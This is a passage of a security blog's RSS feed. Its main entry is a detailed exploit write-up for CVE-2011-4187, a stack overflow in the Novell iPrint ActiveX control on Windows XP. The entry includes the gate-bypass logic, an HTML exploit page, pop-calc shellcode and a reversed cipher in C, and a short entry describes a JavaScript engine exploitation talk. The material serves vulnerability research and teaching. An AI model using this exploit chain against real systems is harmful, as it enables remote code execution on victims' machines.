<pre><code>7f454c46 6a3c580f 05000000 00000000 02003e00 00000000 01000000
01000000 18000000 00000000 18000000 01000000 00000000 00003800
01000000 00000000 01000000 00000000 00000000 00000000
</code></pre>]]></description>
    </item>
    <item>
      <title>Javascript engine exploitation methodology</title>
      <link>https://sigreturn.com/blog/javascript-engine-exploitation-methodology/</link>
      <guid isPermaLink="true">https://sigreturn.com/blog/javascript-engine-exploitation-methodology/</guid>
      <pubDate>Thu, 25 May 2023 12:00:00 +0000</pubDate>
      <author>contact@sigreturn.com (Adam Taguirov)</author>
      <category>Vulnerability Research</category>
      <category>browser</category>
      <category>javascript</category>
      <category>exploitation</category>
      <category>talk</category>
      <description><![CDATA[<p>JavaScript engines are now one of the most attacked surfaces of modern operating systems. They run untrusted code from arbitrary websites the moment a tab opens, sit on top of multi-million-line JIT compilers (V8, JavaScriptCore, SpiderMonkey), and have access to a sandbox that, once broken out of, often leads straight to remote code execution on the host. The bug classes that dominate browser CVE lists today (typer mistakes in JIT optimisation, type confusion on object shapes, edge cases in property accessors and bounds elimination) all live inside this layer.</p>
<p>The talk below walks through the general methodology of approaching such an engine for offensive research: how to read the relevant parts of a multi-million-line C++ codebase, how to recognise the primitive shapes that lead to <code>addrof</code> / <code>fakeobj</code>, and how those primitives compose into a renderer-RCE chain.</p>
<p>It was given in French at the <strong>Quarks in the Shell 2023</strong> conference, organised by <a href="https://content.quarkslab.com/event-quarks-in-the-shell-2023-ads">Quarkslab</a>.</p>
<iframe src="https://www.youtube-nocookie.com/embed/VaaXB8mrtL0" title="Javascript engine exploitation methodology — Quarks in the Shell 2023" allow="accelerometer; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen loading="lazy"></iframe>]]></description>
    </item>
    <item>
      <title>Vulnerability research and ActiveX controller exploitation</title>
      <link>https://sigreturn.com/blog/vulnerability-research-activex-controller-exploitation/</link>
      <guid isPermaLink="true">https://sigreturn.com/blog/vulnerability-research-activex-controller-exploitation/</guid>
      <pubDate>Sat, 28 May 2022 12:00:00 +0000</pubDate>
      <author>contact@sigreturn.com (Adam Taguirov)</author>
      <category>Vulnerability Research</category>
      <category>cve</category>
      <category>reverse-engineering</category>
      <category>exploitation</category>
      <category>windows</category>
      <category>buffer-overflow</category>
      <category>activex</category>
      <description><![CDATA[<div class="admonition note">
<p class="admonition-title">CVE-2011-4187</p>
<p>Stack buffer overflow in <code>IppGetDriverSettings2</code> (<code>nipplib.dll</code>, Novell iPrint Client &lt; 5.78). Reachable from a web page via the iPrint ActiveX controller (CLSID <code>36723F97-7AA0-11D4-8919-FF2D71D0D32C</code>) on Windows XP. No public exploit at the time of research.</p>
</div>
<h2>Target</h2>
<p>The starting point was a CVE number and a one-line summary on cvedetails:</p>
<blockquote>
<p>Buffer overflow in the <strong>GetDriverSettings</strong> function in <strong>nipplib.dll</strong> in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a long realm field, a different vulnerability than CVE-2011-3173.</p>
</blockquote>
<p>No public exploit, almost no third-party write-up. The client only installs on Windows XP, so the whole engagement runs on a Windows XP SP3 VM with a Windows 10 SDK box for tooling.</p>
<p>The iPrint client ships an ActiveX controller. The CLSID can be retrieved by searching the registry for <code>Novell iPrint</code>:</p>
<p><img alt="Registry Editor entry showing the iPrint controller CLSID" src="img/registry_window.png"></p>
<p>The controller is implemented in <code>ienipp.ocx</code> (in <code>C:\Windows\system32\</code>), with the heavy lifting delegated to <code>nipplib.dll</code> in the same directory. Browsing <code>ienipp.ocx</code> with the OLE/COM Object Viewer from the Windows 10 SDK lists the public methods, including <code>GetDriverSettings</code> (the named CVE target) and a <code>GetDriverSettings2</code> variant.</p>
<p><img alt="OLE/COM Object Viewer browsing the methods exposed by ienipp.ocx" src="img/browsing_ocx_file.png"></p>
<p>The controller can be instantiated and invoked from an HTML page in Internet Explorer:</p>
<pre><code class="language-html">&lt;html&gt;
&lt;object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C' id='target'/&gt;
&lt;/object&gt;
&lt;script&gt;
target.GetDriverSettings(&quot;uri&quot;, &quot;realm&quot;, &quot;user&quot;, &quot;password&quot;);
&lt;/script&gt;
&lt;/html&gt;
</code></pre>
<p>A quick sanity check using the controller&rsquo;s <code>ShowMessageBox</code> method confirmed the CLSID and the call convention before going further.</p>
<h2>Reaching the vulnerable function</h2>
<p>Loading <code>ienipp.ocx</code> in IDA (it auto-pulls <code>nipplib.dll</code>) and following xrefs to <code>IppGetDriverSettings2</code> lands on a single call site at <code>ienipp.ocx:0x1000AE54</code>. The block leading to that call enforces several conditions:</p>
<p><img alt="Control flow leading to the vulnerable IppGetDriverSettings2 call site" src="img/cftovuln.png"></p>
<p>The first gate is a length check on each of the four method parameters (<code>printerUri</code>, <code>realm</code>, <code>userName</code>, <code>password</code>). Anything above <code>0x100</code> bytes per parameter aborts before the call. The second gate is a function called <code>sub_1000FBD0</code> (renamed <code>important_check</code>) whose return value selects the next jump:</p>
<p><img alt="main_checks block: important_check return value gates the vulnerable call" src="img/main_checks.png"></p>
<p><code>important_check</code> is a thin wrapper around <code>IppMgmtGetServerVersion2</code>, exported by <code>nipplib.dll</code>. The wrapper returns 0 (which the callsite treats as success and proceeds to the vulnerable call) when <code>IppMgmtGetServerVersion2</code> itself returns 0.</p>
<p><code>IppMgmtGetServerVersion2</code> is a one-line forwarder to <code>sub_5C04B514</code>, where the actual logic lives:</p>
<p><img alt="Control flow graph of sub_5C04B514" src="img/sub_5C04B514.png"></p>
<p>A first-pass reading suggests this function performs the IPP server handshake on port 631 and only succeeds when a real server replies correctly. That would mean emulating an IPP server before any vulnerability work is possible. Reading the CFG without that assumption reveals a more useful structure.</p>
<p>The first conditional jump branches on <code>IppCreateServerRef</code>&rsquo;s return value:</p>
<p><img alt="First conditional jump in sub_5C04B514, branching on IppCreateServerRef" src="img/first_jump.png"></p>
<p>If <code>IppCreateServerRef</code> returns <code>NULL</code>, control flow lands directly on a <code>mov eax, 0; ret</code> block. The function returns <code>0</code>, which is the success code for <code>IppMgmtGetServerVersion2</code>. An allocation/setup failure is being treated as a successful version probe. The IPP handshake never runs, no port 631, no negotiation. The vulnerable call site is reached as long as <code>IppCreateServerRef</code> fails, which is the opposite of what the rest of the function is trying to achieve.</p>
<h2>Forcing IppCreateServerRef to fail</h2>
<p><code>IppCreateServerRef</code> calls a helper <code>sub_50022960</code> and propagates its return value: non-zero from the helper means failure for <code>IppCreateServerRef</code>, which is what is needed.</p>
<p><code>sub_50022960</code> performs two length checks on the <code>printerUri</code> argument. The first is on the total URL length (capped at <code>0x200</code>), but that ceiling is already enforced upstream by the per-parameter <code>0x100</code> cap, so it cannot be tripped here without violating the upstream gate. The second check, located further into the function, validates the length of the substring preceding <code>://</code>:</p>
<p><img alt="Length check on the URL prefix before &quot;://&quot;" src="img/searching_fail_bloc_3.png"></p>
<p>If that prefix exceeds <code>0x100</code> bytes, the function fails. The constraint is therefore:</p>
<ul>
<li>prefix before <code>://</code> must be longer than <code>0x100</code> bytes (to fail <code>sub_50022960</code>),</li>
<li>total URL length must stay under <code>0x200</code> bytes (to pass the <code>ienipp.ocx</code> per-parameter gate).</li>
</ul>
<p>A URL of the form <code>&lt;260-byte garbage&gt;://&lt;short-suffix&gt;</code> satisfies both. With this, <code>IppCreateServerRef</code> returns <code>NULL</code>, <code>IppMgmtGetServerVersion2</code> returns <code>0</code>, <code>important_check</code> returns <code>0</code>, and <code>IppGetDriverSettings2</code> is invoked with attacker-controlled arguments.</p>
<h2>The buffer overflow</h2>
<p><code>IppGetDriverSettings2</code> itself contains one more gate before any vulnerable code: an <code>strstr</code> looking for the literal <code>iPrint-driver-profile-hiddenPA</code> inside the URL.</p>
<p><img alt="strstr check on iPrint-driver-profile-hiddenPA" src="img/check_before_vuln_code.png"></p>
<p>Including that substring in the URL passes the check. There is presumably a legitimate reason for it inside the driver profile flow; for the purpose of reaching the bug it is enough to embed it in the suffix.</p>
<p>Past that gate, the <code>realm</code> parameter is fed unchecked into a <code>strcpy</code> whose destination is a fixed-size stack buffer:</p>
<p><img alt="strcpy taking realm as source, with no length check on the destination" src="img/interesting_strcpy.png"></p>
<p>A <code>realm</code> of, say, <code>0x180</code> bytes overflows the buffer well into the saved return address territory.</p>
<h2>Exploitation</h2>
<h3>Crashing on the saved EIP</h3>
<p>The first crash, with <code>realm</code> filled with <code>A</code>s up to the upstream cap, lands inside a <code>strlen</code>:</p>
<p><img alt="Initial crash inside strlen, EBX = 0x41414141" src="img/inspect_registers.png"></p>
<p>The overflow happened, but execution has already corrupted a pointer (EBX) used by a later function in the same frame, before the function returns. The crash is on a downstream consumer, not on the saved EIP.</p>
<p>The remedy is a shorter <code>realm</code>. The buffer is overrun precisely up to the saved EIP, no further:</p>
<p><img alt="Crash with EIP = 0x41414141 after the ret instruction" src="img/correct_crash.png"></p>
<p>EIP is now under control. There are no DEP/ASLR concerns to discuss on Windows XP SP3 in this configuration.</p>
<h3>Placing a shellcode</h3>
<p>The realm field is too constrained to host both the EIP overwrite and a shellcode. The other method parameters, however, are pushed on the stack ahead of <code>realm</code> and are not subject to the same downstream processing. <code>userName</code> is the natural carrier.</p>
<p>A pop-calc shellcode for Windows XP SP3 EN (<a href="http://shell-storm.org/shellcode/files/shellcode-739.php">shell-storm 739</a>):</p>
<pre><code class="language-asm">&quot;\x31\xC9&quot;             // xor ecx,ecx
&quot;\x51&quot;                 // push ecx
&quot;\x68\x63\x61\x6C\x63&quot; // push 0x636c6163  ('calc')
&quot;\x54&quot;                 // push esp
&quot;\xB8\xC7\x93\xC2\x77&quot; // mov  eax, 0x77c293c7
&quot;\xFF\xD0&quot;             // call eax
</code></pre>
<p><code>xxd -p -r</code> is enough to splice the bytes into the HTML payload&rsquo;s <code>userName</code> argument.</p>
<h3>Reading the shellcode address</h3>
<p>Running a non-malicious payload (long realm prefix to satisfy the bypass, but no overflow on <code>realm</code>) and breakpointing on <code>IppGetDriverSettings2</code> exposes its arguments on the stack. The third argument (<code>userName</code>) holds the buffer address:</p>
<p><img alt="Stack frame at IppGetDriverSettings2: userName address visible" src="img/get_sc_address.png"></p>
<p><code>0x02843728</code> for this run. The Windows XP SP3 process layout is stable enough across launches that this address holds for the next call as long as the process is not restarted.</p>
<h3>Final payload</h3>
<p>Replacing the <code>0x41414141</code> filler at the saved-EIP offset with <code>0x02843728</code> (little-endian) redirects execution into the shellcode after the <code>ret</code>:</p>
<pre><code class="language-html">&lt;html&gt;
&lt;object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C' id='target'/&gt;
&lt;/object&gt;
&lt;script&gt;
target.GetDriverSettings(
  &quot;&lt;260-byte garbage&gt;://iPrint-driver-profile-hiddenPA&quot;,
  &quot;&lt;padding up to saved EIP&gt;&lt;\x28\x37\x84\x02&gt;&quot;,
  &quot;&lt;calc shellcode bytes&gt;&quot;,
  &quot;A&quot;);
&lt;/script&gt;
&lt;/html&gt;
</code></pre>
<p>Loading the page in Internet Explorer:</p>
<p><img alt="calc.exe spawned by the iPrint ActiveX controller" src="img/win.png"></p>
<p>Arbitrary code execution from a single HTML page, no IPP server.</p>
<h2>Failed paths</h2>
<p>Two earlier attempts did not reach the result and are worth recording.</p>
<h3>Emulating the IPP server</h3>
<p>Before noticing the <code>IppCreateServerRef</code>-fails-as-success path, the obvious approach was to make <code>IppMgmtGetServerVersion2</code> succeed legitimately by serving the requests it issues to port 631. Capturing the request with <code>nc -lvp 631</code> showed:</p>
<pre><code>POST /ipp/IppSrvr HTTP/1.1
Accept: application/ipp
User-Agent: Novell iPrint Client - v05.74.00
Content-type: application/ipp
...

@G..attributes-charset.utf-8.H..attributes-natural-language.en-us.D.operation-name.get-server-version.server-version.1.1
</code></pre>
<p>Reverse of the response-validation function (<code>nipplib.5C0450B3</code>) listed the constraints: a 2-byte version-number that must be <code>0x100</code> or <code>0x101</code>, a valid IPP HTTP header (taken verbatim from a CUPS server&rsquo;s reply), and a <code>server-version</code> attribute located via <code>IppFindAttributeInSet</code>. Encoding the attribute group correctly required reading <a href="https://datatracker.ietf.org/doc/html/rfc8010">RFC 8010</a>. The reply parsed up to a point, but every iteration crashed inside a <code>strlen</code> on a <code>NULL</code> argument, suggesting another mandatory attribute or data field that was not being supplied. The path was abandoned when the logic-bug shortcut surfaced.</p>
<h3>Overflowing the ciphertext, not the cleartext</h3>
<p>While searching for the right <code>realm</code> length, a shorter input did not overflow the saved EIP directly but did corrupt it through a second buffer. A function downstream of the <code>strcpy</code> runs the <code>realm</code> value through an internal block cipher (8-byte blocks, key in <code>.data</code>, output written via <code>sprintf("%02hhX", b)</code> into a separate stack buffer that is twice the input length). When the input is short enough to bypass the first overflow and long enough to overrun the ciphertext buffer, EIP is controlled, but only via the hex-string output of <code>sprintf</code>.</p>
<p>The cipher was small enough to port to C and run offline, with the seed key recovered from memory:</p>
<pre><code class="language-c">unsigned int shift_on_key(unsigned int tmp_bloc) {
    unsigned int idx;
    unsigned int s1, s2, s3, s4;

    idx = ((tmp_bloc &gt;&gt; 24) &amp; 0xff) * 4 + 0x048;
    s1  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    idx = ((tmp_bloc &gt;&gt; 16) &amp; 0xff) * 4 + 0x448;
    s2  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    idx = ((tmp_bloc &gt;&gt;  8) &amp; 0xff) * 4 + 0x848;
    s3  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    idx =  (tmp_bloc        &amp; 0xff) * 4 + 0xc48;
    s4  = *((unsigned int *)the_key + idx / sizeof(unsigned int));
    return (((s2 + s1) ^ s3) + s4);
}

/* get_new_key derives (key_part1, key_part2) from the previous key
   through 18 rounds of shift_on_key + xor with the static key blocs. */

int main(int argc, char **argv) {
    char *entry = argv[1];
    int i = 0;
    get_new_key(key, the_key);
    while (entry[i]) {
        for (int b = 0; b &lt; 8; b++) {
            unsigned int kpart = (b &lt; 4) ? key_part1 : key_part2;
            unsigned int sh    = (3 - (b &amp; 3)) * 8;
            if (entry[i]) newbuf[i] = entry[i] ^ ((kpart &gt;&gt; sh) &amp; 0xff);
            i++;
        }
        /* feed back the swapped output bloc as the next &quot;old key&quot; and re-derive */
        ...
        get_new_key(key, the_key);
    }
    /* hex-encode newbuf into realbuf with sprintf(&quot;%02hhX&quot;, ...) */
}
</code></pre>
<p>A search produced an input ending in <code>\xAA\xAA</code>, whose hex encoding is <code>"AAAA"</code>, giving EIP = <code>0x41414141</code>:</p>
<pre><code>./a.out $(python -c 'print &quot;B&quot;*132 + &quot;\x43\x90&quot;')
... 3CCAF8EFDA95CFDA49177C2EAAAA
</code></pre>
<p>EIP control via the ciphertext path is real, but the path is dead. <code>sprintf("%02hhX", b)</code> emits two ASCII hex digits per byte, so each EIP byte is constrained to <code>0x30..0x39</code> or <code>0x41..0x46</code>. No address in the loaded modules or on the stack falls in that alphabet, and the shellcode has no leverage to encode arbitrary bytes through the cipher. The longer-payload approach above sidesteps this entirely.</p>
<h2>Takeaways</h2>
<ul>
<li>Error and allocation paths are often the most valuable to read carefully. The <code>IppCreateServerRef</code>-returns-NULL branch was a complete bypass of the protocol-handshake gate, and it was visible in the CFG without any dynamic analysis.</li>
<li>Length caps distributed across binaries can be played against each other. The upstream <code>0x200</code> cap on the URL is what made the inner <code>0x100</code> prefix check trippable.</li>
<li>A failed exploitation path is still worth reproducing far enough to understand why it fails. Recovering the realm-cipher in C produced a clean structural reason to drop the path, rather than a vague &ldquo;didn&rsquo;t work&rdquo;.</li>
<li>On systems without DEP/ASLR, the gap between EIP control and arbitrary code execution is mostly bookkeeping. The harder problem in this CVE was reaching the vulnerable function at all.</li>
</ul>]]></description>
    </item>
  </channel>
</rss>
